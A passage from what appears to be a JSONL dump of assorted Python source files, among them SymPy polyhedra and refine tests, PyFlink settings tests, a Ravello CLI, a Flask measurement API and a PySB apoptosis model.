12),\n Perm(0, 19)(1, 18)(2, 17)(3, 16)(4, 15)(5, 13)(6, 12)(7, 11)(8, 10)(9, 14),\n Perm(1, 4, 5)(2, 9, 10)(3, 14, 6)(7, 13, 16)(8, 15, 11)(12, 19, 17),\n Perm(19)(0, 6, 2)(3, 5, 11)(4, 10, 7)(8, 14, 17)(9, 16, 12)(13, 15, 18),\n Perm(0, 11, 8)(1, 7, 3)(4, 6, 12)(5, 17, 13)(9, 10, 18)(14, 16, 19),\n Perm(0, 7, 13)(1, 12, 9)(2, 8, 4)(5, 11, 19)(6, 18, 14)(10, 17, 15),\n Perm(0, 3, 9)(1, 8, 14)(2, 13, 5)(6, 12, 15)(7, 19, 10)(11, 18, 16),\n Perm(0, 14, 10)(1, 9, 16)(2, 13, 17)(3, 19, 11)(4, 15, 6)(7, 8, 18),\n Perm(0, 16, 7)(1, 10, 11)(2, 5, 17)(3, 14, 18)(4, 15, 12)(8, 9, 19),\n Perm(0, 16, 13)(1, 17, 8)(2, 11, 12)(3, 6, 18)(4, 10, 19)(5, 15, 9),\n Perm(0, 11, 15)(1, 17, 14)(2, 18, 9)(3, 12, 13)(4, 7, 19)(5, 6, 16),\n Perm(0, 8, 15)(1, 12, 16)(2, 18, 10)(3, 19, 5)(4, 13, 14)(6, 7, 17)))\n\nicosahedron = Polyhedron(\n Tuple(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11),\n Tuple(\n Tuple(0, 1, 2),\n Tuple(0, 2, 3),\n Tuple(0, 3, 4),\n Tuple(0, 4, 5),\n Tuple(0, 1, 5),\n Tuple(1, 6, 7),\n Tuple(1, 2, 7),\n Tuple(2, 7, 8),\n Tuple(2, 3, 8),\n Tuple(3, 8, 9),\n Tuple(3, 4, 9),\n Tuple(4, 9, 10),\n Tuple(4, 5, 10),\n Tuple(5, 6, 10),\n Tuple(1, 5, 6),\n Tuple(6, 7, 11),\n Tuple(7, 8, 11),\n Tuple(8, 9, 11),\n Tuple(9, 10, 11),\n Tuple(6, 10, 11)),\n Tuple(\n Perm(11)(1, 2, 3, 4, 5)(6, 7, 8, 9, 10),\n Perm(0, 5, 6, 7, 2)(3, 4, 10, 11, 8),\n Perm(0, 1, 7, 8, 3)(4, 5, 6, 11, 9),\n Perm(0, 2, 8, 9, 4)(1, 7, 11, 10, 5),\n Perm(0, 3, 9, 10, 5)(1, 2, 8, 11, 6),\n Perm(0, 4, 10, 6, 1)(2, 3, 9, 11, 7),\n Perm(0, 1)(2, 5)(3, 6)(4, 7)(8, 10)(9, 11),\n Perm(0, 2)(1, 3)(4, 7)(5, 8)(6, 9)(10, 11),\n Perm(0, 3)(1, 9)(2, 4)(5, 8)(6, 11)(7, 10),\n Perm(0, 4)(1, 9)(2, 10)(3, 5)(6, 8)(7, 11),\n Perm(0, 5)(1, 4)(2, 10)(3, 6)(7, 9)(8, 11),\n Perm(0, 6)(1, 5)(2, 10)(3, 11)(4, 7)(8, 9),\n Perm(0, 7)(1, 2)(3, 6)(4, 11)(5, 8)(9, 10),\n Perm(0, 8)(1, 9)(2, 3)(4, 7)(5, 11)(6, 10),\n Perm(0, 9)(1, 11)(2, 10)(3, 4)(5, 8)(6, 7),\n Perm(0, 10)(1, 9)(2, 11)(3, 6)(4, 5)(7, 8),\n Perm(0, 11)(1, 6)(2, 10)(3, 9)(4, 8)(5, 7),\n Perm(0, 11)(1, 8)(2, 7)(3, 6)(4, 10)(5, 9),\n Perm(0, 11)(1, 10)(2, 9)(3, 8)(4, 7)(5, 6),\n Perm(0, 11)(1, 7)(2, 6)(3, 10)(4, 9)(5, 8),\n Perm(0, 11)(1, 9)(2, 8)(3, 7)(4, 6)(5, 10),\n Perm(0, 5, 1)(2, 4, 6)(3, 10, 7)(8, 9, 11),\n Perm(0, 1, 2)(3, 5, 7)(4, 6, 8)(9, 10, 11),\n Perm(0, 2, 3)(1, 8, 4)(5, 7, 9)(6, 11, 10),\n Perm(0, 3, 4)(1, 8, 10)(2, 9, 5)(6, 7, 11),\n Perm(0, 4, 5)(1, 3, 10)(2, 9, 6)(7, 8, 11),\n Perm(0, 10, 7)(1, 5, 6)(2, 4, 11)(3, 9, 8),\n Perm(0, 6, 8)(1, 7, 2)(3, 5, 11)(4, 10, 9),\n Perm(0, 7, 9)(1, 11, 4)(2, 8, 3)(5, 6, 10),\n Perm(0, 8, 10)(1, 7, 6)(2, 11, 5)(3, 9, 4),\n Perm(0, 9, 6)(1, 3, 11)(2, 8, 7)(4, 10, 5)))\n\ntetrahedron_faces = list(tuple(arg) for arg in tetrahedron.faces)\n\ncube_faces = list(tuple(arg) for arg in cube.faces)\n\noctahedron_faces = list(tuple(arg) for arg in octahedron.faces)\n\ndodecahedron_faces = list(tuple(arg) for arg in dodecahedron.faces)\n\nicosahedron_faces = list(tuple(arg) for arg in icosahedron.faces)\n"} {"ext": "py", "sha": "1a2f1d56fc766affd2507772267dadcf41f8a7af", "content": "# datadotworld module has been imported as dw\nimport datadotworld as dw\n\n# We've written a SPARQL query for you and assigned it to the `sparql_query` variable:\nsparql_query = \"PREFIX GOT: SELECT ?FName ?LName WHERE {?person GOT:col-got-house \\\"Stark\\\" . ?person GOT:col-got-fname ?FName . 
?person GOT:col-got-lname ?LName .}\"\n\n# Use the pre-defined SPARQL query to query dataset http://data.world/tutorial/sparqltutorial and return the results to a queryResults variable\n\nqueryResults = dw.query(\"http://data.world/tutorial/sparqltutorial\" , sparql_query, query_type = 'sparql')\n\n# Use the dataframe property of the resulting query to create a dataframe variable named `houseStark`\nhouseStark = queryResults.dataframe\n\n# Use pp.pprint() to print the dataframe to the screen.\npp.pprint(houseStark)\n"} {"ext": "py", "sha": "1a2f1ed612e9240a51a9e4eab2cde64ae038814e", "content": "################################################################################\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\nfrom pyflink.java_gateway import get_gateway\n\nfrom pyflink.common import Configuration\nfrom pyflink.table import EnvironmentSettings\nfrom pyflink.testing.test_case_utils import PyFlinkTestCase\n\n\nclass EnvironmentSettingsTests(PyFlinkTestCase):\n\n def test_mode_selection(self):\n\n builder = EnvironmentSettings.new_instance()\n\n # test the default behaviour to make sure it is consistent with the python doc\n environment_settings = builder.build()\n self.assertTrue(environment_settings.is_streaming_mode())\n\n # test in_streaming_mode\n environment_settings = builder.in_streaming_mode().build()\n self.assertTrue(environment_settings.is_streaming_mode())\n\n environment_settings = EnvironmentSettings.in_streaming_mode()\n self.assertTrue(environment_settings.is_streaming_mode())\n\n # test in_batch_mode\n environment_settings = builder.in_batch_mode().build()\n self.assertFalse(environment_settings.is_streaming_mode())\n\n environment_settings = EnvironmentSettings.in_batch_mode()\n self.assertFalse(environment_settings.is_streaming_mode())\n\n def test_with_built_in_catalog_name(self):\n\n gateway = get_gateway()\n\n DEFAULT_BUILTIN_CATALOG = gateway.jvm.TableConfigOptions.TABLE_CATALOG_NAME.defaultValue()\n\n builder = EnvironmentSettings.new_instance()\n\n # test the default behaviour to make sure it is consistent with the python doc\n environment_settings = builder.build()\n\n self.assertEqual(environment_settings.get_built_in_catalog_name(), DEFAULT_BUILTIN_CATALOG)\n\n environment_settings = builder.with_built_in_catalog_name(\"my_catalog\").build()\n\n self.assertEqual(environment_settings.get_built_in_catalog_name(), \"my_catalog\")\n\n def test_with_built_in_database_name(self):\n\n gateway = get_gateway()\n\n DEFAULT_BUILTIN_DATABASE = gateway.jvm.TableConfigOptions.TABLE_DATABASE_NAME.defaultValue()\n\n builder = EnvironmentSettings.new_instance()\n\n # test the default behaviour to make sure it is consistent with the python doc\n 
environment_settings = builder.build()\n\n self.assertEqual(environment_settings.get_built_in_database_name(),\n DEFAULT_BUILTIN_DATABASE)\n\n environment_settings = builder.with_built_in_database_name(\"my_database\").build()\n\n self.assertEqual(environment_settings.get_built_in_database_name(), \"my_database\")\n\n def test_to_configuration(self):\n\n expected_settings = EnvironmentSettings.new_instance().in_batch_mode().build()\n config = expected_settings.to_configuration()\n\n self.assertEqual(\"BATCH\", config.get_string(\"execution.runtime-mode\", \"stream\"))\n\n def test_from_configuration(self):\n\n config = Configuration()\n config.set_string(\"execution.runtime-mode\", \"batch\")\n\n actual_setting = EnvironmentSettings.from_configuration(config)\n self.assertFalse(actual_setting.is_streaming_mode(), \"Use batch mode.\")\n"} {"ext": "py", "sha": "1a2f200557e96a55d1fb6a17f5f1b0e0467a0c05", "content": "#\n# This file is part of ravstack. Ravstack is free software available under\n# the terms of the MIT license. See the file \"LICENSE\" that was provided\n# together with this source file for the licensing terms.\n#\n# Copyright (c) 2015 the ravstack authors. See the file \"AUTHORS\" for a\n# complete list.\n\n\"\"\"Ravello Ironic command-line utility.\n\nUsage:\n ravstack [options] setup\n ravstack [options] proxy-create\n ravstack [options] node-create [-c ] [-m ]\n [-D ] [-n ]\n ravstack [options] node-dump\n ravstack [options] node-list [--all [--cached]]\n ravstack [options] node-start \n ravstack [options] node-stop \n ravstack [options] node-reboot \n ravstack [options] node-get-boot-device \n ravstack [options] node-set-boot-device \n ravstack [options] node-get-macs [--cached]\n ravstack [options] fixup\n ravstack [options] endpoint-resolve [-t ]\n [--start-port ] [--num-ports ]\n ravstack --help\n\nCommand help:\n setup Create ravstack directories and config file.\n proxy-create Create SSH -> Ravello API proxy.\n node-create Create a new node.\n node-dump Dump node definitions to specified file.\n node-list List powered on nodes. (--all lists all nodes)\n node-start Start a node.\n node-stop Stop a node.\n node-reboot Reboot a node.\n node-get-boot-device Return boot device for .\n node-set-boot-device Set boot device for to .\n The boot device may be \"hd\" or \"network\".\n node-get-macs Return MAC addresses for .\n fixup Fix Ravello and OS config after one or\n more nodes were deployed.\n endpoint-resolve Resolve an endpoint for a local service using\n a public IP address or under portmapping.\n\nOptions:\n -d, --debug Enable debugging.\n -v, --verbose Be verbose.\n --log-stderr Show logs on standard error.\n -u , --username=\n Ravello API username.\n -p , --password=\n Ravello API password.\n -a , --application=\n The Ravello application name.\n --all List all nodes.\n --cached Allow use of cached information.\n\nOptions for `node-create`:\n -c , --cpus=\n The number of CPUs. [default: 2]\n -m , --memory=\n The amount of memory in MB. [default: 8192]\n -D , --disk=\n The size of the disk in GB. [default: 60]\n -n , --count=\n The number of nodes to create. [default: 1]\n\nOptions for `endpoint-resolve`:\n -t , --timeout \n Timeout. [default: 2]\n --start-port Starting port for endpoint resolution with\n portmapping. [default: 10000]\n --num-ports Number of ports to scan for endpoint resulution\n with portmapping. [default: 50]\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport docopt\n\nfrom . 
import factory, setup, node, proxy, fixup, endpoint, runtime\nfrom .runtime import CONF\n\n\ndef main():\n \"\"\"Ravstack main entry point.\"\"\"\n\n args = docopt.docopt(__doc__)\n CONF.update_from_args(args)\n CONF.update_to_env()\n runtime.setup_logging() # logging configuration might have changed\n\n env = factory.get_environ(args)\n\n if args['setup']:\n setup.do_setup(env)\n elif args['proxy-create']:\n proxy.do_create(env)\n elif args['node-create']:\n node.do_create(env)\n elif args['node-dump']:\n node.do_dump(env)\n elif args['node-list'] and not args.get('--all'):\n node.do_list_running(env, False)\n elif args['node-list']:\n node.do_list_all(env)\n elif args['node-start']:\n node.do_start(env, args[''])\n elif args['node-stop']:\n node.do_stop(env, args[''])\n elif args['node-reboot']:\n node.do_reboot(env, args[''])\n elif args['node-get-boot-device']:\n node.do_get_boot_device(env, args[''])\n elif args['node-set-boot-device']:\n node.do_set_boot_device(env, args[''], args[''])\n elif args['node-get-macs']:\n node.do_get_macs(env, args[''], False)\n elif args['fixup']:\n fixup.do_fixup(env)\n elif args['endpoint-resolve']:\n endpoint.do_resolve(env, args[''])\n\n\ndef run_main():\n \"\"\"Setuptools entry point.\"\"\"\n runtime.run_main(main)\n\n\nif __name__ == '__main__':\n run_main()\n"} {"ext": "py", "sha": "1a2f2082e47d81d711d46d913e34e347eef20e68", "content": "from sympy import (Abs, exp, Expr, I, pi, Q, Rational, refine, S, sqrt,\n atan, atan2, nan, Symbol)\nfrom sympy.abc import x, y, z\nfrom sympy.core.relational import Eq, Ne\nfrom sympy.functions.elementary.piecewise import Piecewise\nfrom sympy.utilities.pytest import slow\n\n\ndef test_Abs():\n assert refine(Abs(x), Q.positive(x)) == x\n assert refine(1 + Abs(x), Q.positive(x)) == 1 + x\n assert refine(Abs(x), Q.negative(x)) == -x\n assert refine(1 + Abs(x), Q.negative(x)) == 1 - x\n\n assert refine(Abs(x**2)) != x**2\n assert refine(Abs(x**2), Q.real(x)) == x**2\n\n\n@slow\ndef test_pow1():\n assert refine((-1)**x, Q.even(x)) == 1\n assert refine((-1)**x, Q.odd(x)) == -1\n assert refine((-2)**x, Q.even(x)) == 2**x\n\n # nested powers\n assert refine(sqrt(x**2)) != Abs(x)\n assert refine(sqrt(x**2), Q.complex(x)) != Abs(x)\n assert refine(sqrt(x**2), Q.real(x)) == Abs(x)\n assert refine(sqrt(x**2), Q.positive(x)) == x\n assert refine((x**3)**(S(1)/3)) != x\n\n assert refine((x**3)**(S(1)/3), Q.real(x)) != x\n assert refine((x**3)**(S(1)/3), Q.positive(x)) == x\n\n assert refine(sqrt(1/x), Q.real(x)) != 1/sqrt(x)\n assert refine(sqrt(1/x), Q.positive(x)) == 1/sqrt(x)\n\n\n@slow\ndef test_pow2():\n # powers of (-1)\n assert refine((-1)**(x + y), Q.even(x)) == (-1)**y\n assert refine((-1)**(x + y + z), Q.odd(x) & Q.odd(z)) == (-1)**y\n assert refine((-1)**(x + y + 1), Q.odd(x)) == (-1)**y\n assert refine((-1)**(x + y + 2), Q.odd(x)) == (-1)**(y + 1)\n assert refine((-1)**(x + 3)) == (-1)**(x + 1)\n\n\n@slow\ndef test_pow3():\n # continuation\n assert refine((-1)**((-1)**x/2 - S.Half), Q.integer(x)) == (-1)**x\n assert refine((-1)**((-1)**x/2 + S.Half), Q.integer(x)) == (-1)**(x + 1)\n assert refine((-1)**((-1)**x/2 + 5*S.Half), Q.integer(x)) == (-1)**(x + 1)\n\n\n@slow\ndef test_pow4():\n assert refine((-1)**((-1)**x/2 - 7*S.Half), Q.integer(x)) == (-1)**(x + 1)\n assert refine((-1)**((-1)**x/2 - 9*S.Half), Q.integer(x)) == (-1)**x\n\n # powers of Abs\n assert refine(Abs(x)**2, Q.real(x)) == x**2\n assert refine(Abs(x)**3, Q.real(x)) == Abs(x)**3\n assert refine(Abs(x)**2) == Abs(x)**2\n\n\ndef test_exp():\n x = 
Symbol('x', integer=True)\n assert refine(exp(pi*I*2*x)) == 1\n assert refine(exp(pi*I*2*(x + Rational(1, 2)))) == -1\n assert refine(exp(pi*I*2*(x + Rational(1, 4)))) == I\n assert refine(exp(pi*I*2*(x + Rational(3, 4)))) == -I\n\n\ndef test_Relational():\n assert not refine(x < 0, ~Q.is_true(x < 0))\n assert refine(x < 0, Q.is_true(x < 0))\n assert refine(x < 0, Q.is_true(0 > x)) == True\n assert refine(x < 0, Q.is_true(y < 0)) == (x < 0)\n assert not refine(x <= 0, ~Q.is_true(x <= 0))\n assert refine(x <= 0, Q.is_true(x <= 0))\n assert refine(x <= 0, Q.is_true(0 >= x)) == True\n assert refine(x <= 0, Q.is_true(y <= 0)) == (x <= 0)\n assert not refine(x > 0, ~Q.is_true(x > 0))\n assert refine(x > 0, Q.is_true(x > 0))\n assert refine(x > 0, Q.is_true(0 < x)) == True\n assert refine(x > 0, Q.is_true(y > 0)) == (x > 0)\n assert not refine(x >= 0, ~Q.is_true(x >= 0))\n assert refine(x >= 0, Q.is_true(x >= 0))\n assert refine(x >= 0, Q.is_true(0 <= x)) == True\n assert refine(x >= 0, Q.is_true(y >= 0)) == (x >= 0)\n assert not refine(Eq(x, 0), ~Q.is_true(Eq(x, 0)))\n assert refine(Eq(x, 0), Q.is_true(Eq(x, 0)))\n assert refine(Eq(x, 0), Q.is_true(Eq(0, x))) == True\n assert refine(Eq(x, 0), Q.is_true(Eq(y, 0))) == Eq(x, 0)\n assert not refine(Ne(x, 0), ~Q.is_true(Ne(x, 0)))\n assert refine(Ne(x, 0), Q.is_true(Ne(0, x))) == True\n assert refine(Ne(x, 0), Q.is_true(Ne(x, 0)))\n assert refine(Ne(x, 0), Q.is_true(Ne(y, 0))) == (Ne(x, 0))\n\n\ndef test_Piecewise():\n assert refine(Piecewise((1, x < 0), (3, True)), Q.is_true(x < 0)) == 1\n assert refine(Piecewise((1, x < 0), (3, True)), ~Q.is_true(x < 0)) == 3\n assert refine(Piecewise((1, x < 0), (3, True)), Q.is_true(y < 0)) == \\\n Piecewise((1, x < 0), (3, True))\n assert refine(Piecewise((1, x > 0), (3, True)), Q.is_true(x > 0)) == 1\n assert refine(Piecewise((1, x > 0), (3, True)), ~Q.is_true(x > 0)) == 3\n assert refine(Piecewise((1, x > 0), (3, True)), Q.is_true(y > 0)) == \\\n Piecewise((1, x > 0), (3, True))\n assert refine(Piecewise((1, x <= 0), (3, True)), Q.is_true(x <= 0)) == 1\n assert refine(Piecewise((1, x <= 0), (3, True)), ~Q.is_true(x <= 0)) == 3\n assert refine(Piecewise((1, x <= 0), (3, True)), Q.is_true(y <= 0)) == \\\n Piecewise((1, x <= 0), (3, True))\n assert refine(Piecewise((1, x >= 0), (3, True)), Q.is_true(x >= 0)) == 1\n assert refine(Piecewise((1, x >= 0), (3, True)), ~Q.is_true(x >= 0)) == 3\n assert refine(Piecewise((1, x >= 0), (3, True)), Q.is_true(y >= 0)) == \\\n Piecewise((1, x >= 0), (3, True))\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), Q.is_true(Eq(x, 0)))\\\n == 1\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), Q.is_true(Eq(0, x)))\\\n == 1\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), ~Q.is_true(Eq(x, 0)))\\\n == 3\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), ~Q.is_true(Eq(0, x)))\\\n == 3\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), Q.is_true(Eq(y, 0)))\\\n == Piecewise((1, Eq(x, 0)), (3, True))\n assert refine(Piecewise((1, Ne(x, 0)), (3, True)), Q.is_true(Ne(x, 0)))\\\n == 1\n assert refine(Piecewise((1, Ne(x, 0)), (3, True)), ~Q.is_true(Ne(x, 0)))\\\n == 3\n assert refine(Piecewise((1, Ne(x, 0)), (3, True)), Q.is_true(Ne(y, 0)))\\\n == Piecewise((1, Ne(x, 0)), (3, True))\n\n\ndef test_atan2():\n assert refine(atan2(y, x), Q.real(y) & Q.positive(x)) == atan(y/x)\n assert refine(atan2(y, x), Q.negative(y) & Q.positive(x)) == atan(y/x)\n assert refine(atan2(y, x), Q.negative(y) & Q.negative(x)) == atan(y/x) - pi\n assert refine(atan2(y, x), Q.positive(y) & 
Q.negative(x)) == atan(y/x) + pi\n assert refine(atan2(y, x), Q.zero(y) & Q.negative(x)) == pi\n assert refine(atan2(y, x), Q.positive(y) & Q.zero(x)) == pi/2\n assert refine(atan2(y, x), Q.negative(y) & Q.zero(x)) == -pi/2\n assert refine(atan2(y, x), Q.zero(y) & Q.zero(x)) == nan\n\n\ndef test_func_args():\n class MyClass(Expr):\n # A class with nontrivial .func\n\n def __init__(self, *args):\n self.my_member = \"\"\n\n @property\n def func(self):\n def my_func(*args):\n obj = MyClass(*args)\n obj.my_member = self.my_member\n return obj\n return my_func\n\n x = MyClass()\n x.my_member = \"A very important value\"\n assert x.my_member == refine(x).my_member\n\n\ndef test_eval_refine():\n from sympy.core.expr import Expr\n class MockExpr(Expr):\n def _eval_refine(self, assumptions):\n return True\n\n mock_obj = MockExpr()\n assert refine(mock_obj)\n\ndef test_refine_issue_12724():\n expr1 = refine(Abs(x * y), Q.positive(x))\n expr2 = refine(Abs(x * y * z), Q.positive(x))\n assert expr1 == x * Abs(y)\n assert expr2 == x * Abs(y * z)\n y1 = Symbol('y1', real = True)\n expr3 = refine(Abs(x * y1**2 * z), Q.positive(x))\n assert expr3 == x * y1**2 * Abs(z)\n"} {"ext": "py", "sha": "1a2f20b4f57c9954cfe57f7236c48aedc8151d94", "content": "from __future__ import print_function\nimport numpy as np\n\ndef q(y_true, y_pred):\n\t'''q value as described in Tropsha, Gramatica, Gombar:\n\tThe Importance of Being Earnest'''\n\ty_true = np.array(y_true)\n\ty_pred = np.array(y_pred)\n\ty_mean = np.mean(y_true)\n\treturn 1 - np.sum((y_true - y_pred) ** 2) / np.sum((y_true - y_mean) ** 2)\n\ndef linreg(x, y):\n\t'''Computes a linear regression through the origin using OLS'''\n\tx = np.array(x)\n\ty = np.array(y)\n\tx = x[:, np.newaxis]\n\ta, _, _, _ = np.linalg.lstsq(x, y, rcond=-1.)\n\tr2 = q(y, (x * a)[:, 0])\n\treturn (r2, a)"} {"ext": "py", "sha": "1a2f20b95d23ec33820bade8a811fd92a94e6e44", "content": "import os\n\nfrom dateutil.parser import parse as date_parser\nfrom flask import request, current_app\nfrom flask_restful.fields import Integer, List, Nested, Raw, String\nfrom werkzeug.utils import secure_filename\n\nfrom analysisweb.api import db\nfrom analysisweb_user.models import Measurement, MeasurementFile\nfrom . 
import (\n ResourceBase,\n MetaResource,\n ResourceInvalidInputException,\n ResourceForbiddenActionException,\n ResourceNotFoundException,\n IDField,\n)\n\n\nclass MeasurementResource(ResourceBase):\n\n db_table = Measurement\n\n measurement_file = {\n \"label\": String,\n \"path\": String(\n attribute=lambda x: \"files/measurement/{}/{}\".format(\n x.measurement_id, x.path\n )\n ),\n }\n\n fields = {\n \"id\": Integer,\n \"label\": String,\n \"start_date\": String,\n \"end_date\": String,\n \"meta_data\": Raw,\n \"files\": List(Nested(measurement_file)),\n \"jobs\": List(IDField),\n }\n\n def get(self, id_):\n \"\"\"\n Receive a measurement\n ---\n summary: Find a measurement by ID\n tags:\n - measurements\n parameters:\n - name: id\n in: path\n description: ID of measurement to return\n required: true\n schema:\n type: integer\n responses:\n 200:\n description: successful operation\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/Measurement\"\n 400:\n description: Invalid ID supplied\n 404:\n description: Measurement not found\n \"\"\"\n try:\n resource = self.get_resource(id_)\n except (ResourceInvalidInputException, ResourceNotFoundException) as e:\n return {\"status\": str(e)}, e.response_code\n return self.dump_resource(resource), 200\n\n def delete(self, id_):\n \"\"\"\n Delete a measurement\n ---\n summary: Deletes a measurement\n tags:\n - measurements\n parameters:\n - name: id\n in: path\n description: ID of measurement to return\n required: true\n schema:\n type: integer\n responses:\n 200:\n description: Measurement deleted and returned\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/Measurement\"\n 400:\n description: Invalid ID supplied\n 404:\n description: Measurement not found\n 405:\n description: Cannot delete measurement associated with a job\n \"\"\"\n try:\n resource = self.get_resource(id_)\n except (ResourceInvalidInputException, ResourceNotFoundException) as e:\n return {\"status\": str(e)}, e.response_code\n\n try:\n return self.delete_resource(\n current_app.config[\"MEASUREMENT_FILES_FOLDER\"], resource\n )\n except ResourceForbiddenActionException as e:\n return {\"status\": str(e)}, e.response_code\n\n def put(self, id_):\n \"\"\"\n Update the basic information about a measurement\n ---\n summary: Updates a measurement with new data\n tags:\n - measurements\n parameters:\n - name: id\n in: path\n description: ID of measurement to return\n required: true\n schema:\n type: integer\n requestBody:\n content:\n multipart/form-data:\n schema:\n properties:\n start_date:\n type: string\n format: date-time\n end_date:\n type: string\n format: date-time\n label:\n type: string\n meta_data:\n type: string\n responses:\n 200:\n description: Measurement updated and returned\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/Measurement\"\n 400:\n description: Invalid ID supplied or invalid input\n 404:\n description: Measurement not found\n \"\"\"\n\n try:\n resource = self.get_resource(id_)\n except (ResourceInvalidInputException, ResourceNotFoundException) as e:\n return {\"status\": str(e)}, e.response_code\n\n try:\n self._update_measurement(resource)\n except ResourceInvalidInputException as e:\n return {\"status\": str(e)}, e.response_code\n return self.dump_resource(resource), 200\n\n def _update_measurement(self, resource):\n start_date, end_date = self.parse_dates(\n str(resource.start_date), str(resource.end_date)\n )\n resource.start_date = start_date\n resource.end_date = end_date\n 
resource.label = request.form.get(\"label\", resource.label)\n self.load_metadata(request.form.get(\"meta_data\", \"{}\"), resource)\n db.session.commit()\n\n @staticmethod\n def parse_dates(start=None, end=None):\n try:\n start_date = date_parser(request.form.get(\"start_date\", start))\n end_date = date_parser(request.form.get(\"end_date\", end))\n except ValueError as e:\n raise ResourceInvalidInputException(str(e))\n\n if end_date < start_date:\n raise ResourceInvalidInputException(\"end date < start date\")\n return start_date, end_date\n\n\nclass MeasurementListResource(ResourceBase):\n\n db_table = Measurement\n fields = MeasurementResource.fields\n\n def get(self):\n \"\"\"\n Obtain a list of measurements\n ---\n summary: Retrieve a list of measurements\n tags:\n - measurements\n responses:\n 200:\n description: OK\n content:\n application/json:\n schema:\n type: array\n items:\n $ref: \"#/components/schemas/Measurement\"\n \"\"\"\n return self.get_all(), 200\n\n def post(self):\n \"\"\"\n Add a new measurement\n ---\n summary: Add a new measurement\n tags:\n - measurements\n requestBody:\n content:\n multipart/form-data:\n schema:\n properties:\n start_date:\n type: string\n format: date-time\n end_date:\n type: string\n format: date-time\n label:\n type: string\n meta_data:\n type: string\n files:\n type: array\n items:\n $ref: \"#/components/schemas/File\"\n responses:\n 201:\n description: Measurement created\n 400:\n description: Invalid input\n \"\"\"\n try:\n measurement_id = self._add_measurement()\n except ResourceInvalidInputException as e:\n return {\"status\": str(e)}, e.response_code\n return {\"status\": \"success\", \"id\": measurement_id}, 201\n\n def _add_measurement(self):\n self._validate_form_data()\n start_date, end_date = MeasurementResource.parse_dates()\n m = Measurement(\n start_date=start_date, end_date=end_date, label=request.form[\"label\"]\n )\n db.session.add(m)\n db.session.flush()\n measurement_id = m.id\n self.load_metadata(request.form.get(\"meta_data\", \"{}\"), m)\n file_folder = os.path.join(\n current_app.config[\"MEASUREMENT_FILES_FOLDER\"], str(measurement_id)\n )\n os.makedirs(file_folder)\n print(request.files)\n self._add_measurement_files(m, request.files.items(), file_folder)\n db.session.commit()\n return measurement_id\n\n @staticmethod\n def _add_measurement_files(measurement, file_list, path):\n \"\"\"\n Add files to a measurement\n\n Parameters\n ----------\n measurement: Measurement\n the measurement to which add the files\n file_list: list of werkzeug.Files\n the given list of files\n path: str\n the folder in which to upload the files to\n \"\"\"\n for label, file in file_list:\n if file:\n filename = secure_filename(file.filename)\n file.save(os.path.join(path, filename))\n f = MeasurementFile(label=label, path=filename, measurement=measurement)\n db.session.add(f)\n\n @staticmethod\n def _validate_form_data():\n if (\n \"start_date\" not in request.form\n or \"end_date\" not in request.form\n or \"label\" not in request.form\n or not request.files\n ):\n raise ResourceInvalidInputException(\"Missing input\")\n\n\nclass MeasurementMetaResource(MetaResource):\n def get(self):\n return self.load_meta(\"user_meta.json\")\n"} {"ext": "py", "sha": "1a2f20d5bffc38dc6ca1d9ea88d5489f700e4fac", "content": "# exported from PySB model 'model'\n\nfrom pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD\n\nModel()\n\nMonomer('C6A', ['C8pro'])\nMonomer('BaxA', ['BaxM', 
'BaxA_1', 'BaxA_2', 'SmacM'])\nMonomer('Ligand', ['Receptor'])\nMonomer('C6pro', ['C3A'])\nMonomer('ParpU', ['C3A'])\nMonomer('BidU', ['C8A'])\nMonomer('BidT')\nMonomer('C3A', ['Xiap', 'ParpU', 'C6pro'])\nMonomer('BidM', ['BaxM'])\nMonomer('BaxM', ['BidM', 'BaxA'])\nMonomer('C8A', ['BidU', 'C3pro'])\nMonomer('Xiap', ['SmacC', 'C3A'])\nMonomer('Receptor', ['Ligand', 'Fadd'])\nMonomer('C3ub')\nMonomer('Fadd', ['Receptor', 'C8pro'])\nMonomer('C3pro', ['C8A'])\nMonomer('SmacM', ['BaxA'])\nMonomer('SmacC', ['Xiap'])\nMonomer('C8pro', ['Fadd', 'C6A'])\nMonomer('ParpC')\n\nParameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)\nParameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)\nParameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)\nParameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 